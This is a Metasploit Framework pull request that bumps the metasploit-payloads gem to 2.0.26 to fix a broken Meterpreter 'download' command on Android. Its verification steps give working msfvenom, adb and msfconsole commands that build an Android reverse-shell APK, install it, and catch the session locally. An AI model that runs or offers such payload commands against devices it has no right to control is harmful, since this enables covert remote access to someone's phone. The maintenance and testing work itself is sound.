### PR TITLE
fix #14526, fix #14534, fix #14535, fix #14546, bump metasploit-payloads to 2.0.26

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -29,7 +29,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 2.0.24)
+      metasploit-payloads (= 2.0.26)
       metasploit_data_models
       metasploit_payloads-mettle (= 1.0.2)
       mqtt
@@ -224,7 +224,7 @@ GEM
       activemodel (~> 5.2.2)
       activesupport (~> 5.2.2)
       railties (~> 5.2.2)
-    metasploit-payloads (2.0.24)
+    metasploit-payloads (2.0.26)
     metasploit_data_models (4.1.1)
       activerecord (~> 5.2.2)
       activesupport (~> 5.2.2)

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.24'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.26'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.2'
   # Needed by msfgui and other rpc components


### PR DESCRIPTION
This pull request bumps the metasploit-payloads gem to include:
https://github.com/rapid7/metasploit-payloads/pull/449

This fixes:
https://github.com/rapid7/metasploit-framework/issues/14526
https://github.com/rapid7/metasploit-framework/issues/14534
https://github.com/rapid7/metasploit-framework/issues/14535
https://github.com/rapid7/metasploit-framework/issues/14546

## Verification

- [ ] Get an Android meterpreter session (via adb):
```
msfvenom -p android/meterpreter/reverse_tcp SessionRetryWait=2 LHOST=127.0.0.1 LPORT=4444 -o met.apk
adb install met.apk
adb reverse tcp:4444 tcp:4444
adb shell am startservice com.metasploit.stage/.MainService
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost 127.0.0.1; set lport 4444; set ExitOnSession false; run -j"
```
- [ ] Try `meterpreter > download`

## Before fix:
```
meterpreter > download lol
[*] Downloading: lol -> lol
[-] 4: Operation failed: 1
meterpreter >
```

## After fix:
```
meterpreter > download lol
[*] Downloading: lol -> lol
[*] Downloaded 6.00 B of 6.00 B (100.0%): lol -> lol
[*] download   : lol -> lol
meterpreter >
```
